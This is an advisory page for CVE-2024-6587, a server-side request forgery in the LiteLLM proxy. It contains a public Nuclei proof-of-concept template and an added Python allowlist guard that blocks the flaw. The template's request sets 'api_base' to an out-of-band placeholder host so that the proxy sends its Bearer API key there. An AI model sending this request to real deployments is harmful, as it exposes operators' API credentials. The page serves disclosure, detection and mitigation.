CVE-2024-6587: LiteLLM - Server-Side Request Forgery

Date: 2025-08-01 | Affected software: LiteLLM | PoC: public

Vulnerability description

LiteLLM is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability that exposes OpenAI API keys: the chat/completions endpoint accepts a caller-supplied `api_base`, and the proxy forwards the upstream request, including the `Authorization: Bearer` header carrying the configured key, to that host.

PoC code [public] (Nuclei template)

```yaml
id: CVE-2024-6587

info:
  name: LiteLLM - Server-Side Request Forgery
  author: pdresearch,iamnoooob,rootxharsh,lambdasawa
  severity: high
  description: |
    LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
  impact: |
    Attackers can exploit SSRF to send requests to arbitrary URLs with OpenAI API keys in the Authorization header, potentially exposing API credentials.
  remediation: |
    Update LiteLLM to the latest version that addresses the SSRF vulnerability in the chat/completions endpoint.
  reference:
    - https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
  classification:
    epss-score: 0.87671
    epss-percentile: 0.99444
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:439373620
  tags: cve,cve2024,ssrf,openai,litellm,vkev,vuln

http:
  - raw:
      - |
        POST /chat/completions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "model": "command-nightly",
          "messages": [
            {
              "content": "Hello, how are you?",
              "role": "user"
            }
          ],
          "api_base": "https://{{interactsh-url}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "Bearer"
# digest: 4a0a0047304502206e7a6e78afbc82ab0a4b16bf395e7af624cc1e55f9eb70dd5c0fd30a8af569c6022100cb6a3aa20bcad11e3ce0c25db11ee10fc7cc4a16ab4837e38e1dbbfd6dfe9242:922c64590222798bb761d5b6d8e72950
```
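The template above fires when the proxy honours a caller-supplied `api_base` and sends its Bearer token there. The following is an added example, not LiteLLM's own code, of the server-side guard that closes this bug class (only an operator-configured allowlist may choose the upstream host) plus a small scanner that applies the same rule to constructed request-log lines; the allowlist hosts, the `base_url` key and the log-line format are assumptions.

```python
"""Request-body guard for a LiteLLM-style proxy (added example, not LiteLLM code).

CVE-2024-6587: /chat/completions forwarded the upstream call, Authorization:
Bearer <key> included, to whatever host the request body named in "api_base".
Mitigation: the body must never pick the upstream host; an allowlist does.
"""
import json
from urllib.parse import urlsplit

# Hypothetical allowlist: upstream hosts the operator actually configured.
ALLOWED_API_HOSTS = {"api.openai.com", "api.cohere.ai"}

# Body keys that would redirect the proxy's upstream call ("base_url" assumed).
OVERRIDE_KEYS = ("api_base", "base_url")


def classify_request(body: dict, allowed_hosts=ALLOWED_API_HOSTS) -> str:
    """Return "ok", "reject:<key>" or "reject:<key>:<host>" for one request body."""
    for key in OVERRIDE_KEYS:
        if key not in body:
            continue
        value = body[key]
        if not isinstance(value, str):
            return f"reject:{key}"
        parts = urlsplit(value)
        # Reject non-https, hostless, and userinfo forms like https://api.openai.com@other
        if parts.scheme != "https" or not parts.hostname or "@" in parts.netloc:
            return f"reject:{key}"
        if parts.hostname.lower() not in allowed_hosts:
            return f"reject:{key}:{parts.hostname.lower()}"
    return "ok"


def scan_log(lines):
    """Run classify_request over constructed log lines of the form '<path> <json-body>'."""
    findings = []
    for line in lines:
        try:
            path, raw = line.split(" ", 1)
            body = json.loads(raw)
        except ValueError:  # malformed line or body; JSONDecodeError is a ValueError
            continue
        if path == "/chat/completions" and isinstance(body, dict):
            verdict = classify_request(body)
            if verdict != "ok":
                findings.append(verdict)
    return findings
```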
